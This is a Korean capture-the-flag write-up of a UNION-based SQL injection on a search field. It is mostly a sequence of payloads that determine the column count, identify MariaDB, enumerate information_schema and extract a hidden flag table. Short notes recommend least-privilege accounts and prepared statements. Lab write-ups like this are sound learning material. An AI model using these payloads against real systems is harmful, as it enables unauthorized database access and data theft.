예상되는 서버 쿼리: select 게시글 from 테이블 where Title like '%%' (검색어가 두 % 사이에 들어감)
' union select 1,2,3;-- -
union select가 동작하는 것을 확인. 검색어가 쿼리 문자열에 그대로 이어 붙여지고 있고, 결과 컬럼 수는 3개라는 뜻이다.
' union select version(),2,3;-- -
version() 출력으로 DBMS가 MariaDB인 것을 확인
MariaDB에도 information_schema가 존재한다. 여기에는 접속 계정이 권한을 가진 객체만 나타나므로, 애플리케이션 DB 계정의 권한을 최소화하면 노출되는 메타데이터 범위도 줄어든다.
' union select table_name from information_shema.tables;-- -
' union select 1,2,(select table_name from information_schema.tables limit 1);-- -
' union select 1,2,(select table_name from information_schema.tables limit 1,2);-- -
서브쿼리 결과가 한 칸에 한 행씩만 출력되기 때문에, 일단 ALL_PLUGINS 테이블 하나밖에 안 보임
' union select 1,2,(select table_name from information_schema.tables limit 294,1);-- -
limit 294,1 위치에서 users 테이블 확인
' union select 1,2,(select table_name from information_schema.tables limit 293,1);-- -
hahahahahathisissecrettable5ebe2294ecd0e0f08eab7690d2a6ee69
limit 293,1 위치에서 이름이 수상한 테이블 확인
' union select 1,2,(select column_name from information_schema.columns where table_name='hahahahahathisissecrettable5ebe2294ecd0e0f08eab7690d2a6ee69' limit 0,1);-- -
해당 테이블의 첫 번째 열 이름이 idx인 것을 확인
' union select 1,(select column_name from information_schema.columns where table_name='hahahahahathisissecrettable5ebe2294ecd0e0f08eab7690d2a6ee69' limit 1,1),3;-- -
두 번째 열 이름이 super_secret_flag_327a6c4304ad5938eaf0efb6cc3e53dc인 것을 확인
' union select 1,(select super_secret_flag_327a6c4304ad5938eaf0efb6cc3e53dc from hahahahahathisissecrettable5ebe2294ecd0e0f08eab7690d2a6ee69 limit 0,1),3;-- -
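flag 값 확인. 근본 원인은 검색어를 쿼리 문자열에 직접 이어 붙인 것이므로, LIKE에 들어가는 값을 바인딩 파라미터로 넘기는 prepared statement로 바꾸면 위 입력들은 모두 단순한 검색 문자열로만 처리된다.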